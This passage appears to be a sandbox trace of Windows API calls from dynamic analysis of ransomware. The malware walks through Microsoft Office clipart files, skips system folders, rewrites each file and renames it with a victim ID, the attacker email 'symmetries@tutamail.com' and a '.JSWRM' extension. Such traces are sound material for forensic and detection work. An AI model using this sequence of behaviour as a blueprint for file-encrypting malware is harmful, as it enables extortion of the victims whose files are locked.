CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200467.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200467.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200467.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0087.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.855] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13934) returned 1 [0087.855] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3660) returned 0x24d210 [0087.856] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3660, lpOverlapped=0x0) returned 1 [0087.857] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.858] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3660, lpOverlapped=0x0) returned 1 [0087.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.858] CloseHandle (hObject=0x314) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0087.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0087.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0087.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.858] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200467.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200467.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.859] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x273e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200521.WMF", cAlternateFileName="")) returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2=".") returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="..") returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="...") returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="windows") returned -1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="recovery") returned -1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="perflogs") returned -1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="documents and settings") returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="system volume information") returned -1 [0087.859] lstrcmpiW (lpString1="J0200521.WMF", lpString2="msocache") returned -1 [0087.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200521.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200521.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200521.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200521.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200521.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200521.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.860] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10046) returned 1 [0087.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2730) returned 0x24d210 [0087.860] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2730, lpOverlapped=0x0) returned 1 [0087.862] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.862] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2730, lpOverlapped=0x0) returned 1 [0087.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.863] CloseHandle (hObject=0x314) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0087.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0087.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0087.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0087.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.863] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200521.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200521.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0087.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.864] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf36, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200611.WMF", cAlternateFileName="")) returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2=".") returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="..") returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="...") returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="windows") returned -1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="recovery") returned -1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="perflogs") returned -1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="documents and settings") returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="system volume information") returned -1 [0087.864] lstrcmpiW (lpString1="J0200611.WMF", lpString2="msocache") returned -1 [0087.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200611.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200611.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200611.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200611.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200611.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200611.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.865] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3894) returned 1 [0087.866] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf30) returned 0x23fc98 [0087.866] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf30, lpOverlapped=0x0) returned 1 [0087.868] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.868] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf30, lpOverlapped=0x0) returned 1 [0087.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.868] CloseHandle (hObject=0x314) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0087.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0087.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0087.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.868] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.869] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa50e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0202045.JPG", cAlternateFileName="")) returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2=".") returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="..") returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="...") returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="windows") returned -1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="recovery") returned -1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="perflogs") returned -1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="documents and settings") returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="$RECYCLE.BIN") returned 1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="system volume information") returned -1 [0087.869] lstrcmpiW (lpString1="J0202045.JPG", lpString2="msocache") returned -1 [0087.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0202045.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0202045.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0202045.JPG", lpUsedDefaultChar=0x0) returned 12 [0087.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0202045.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0202045.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0202045.JPG", lpUsedDefaultChar=0x0) returned 12 [0087.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0202045.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.871] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42254) returned 1 [0087.871] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa500) returned 0x24d210 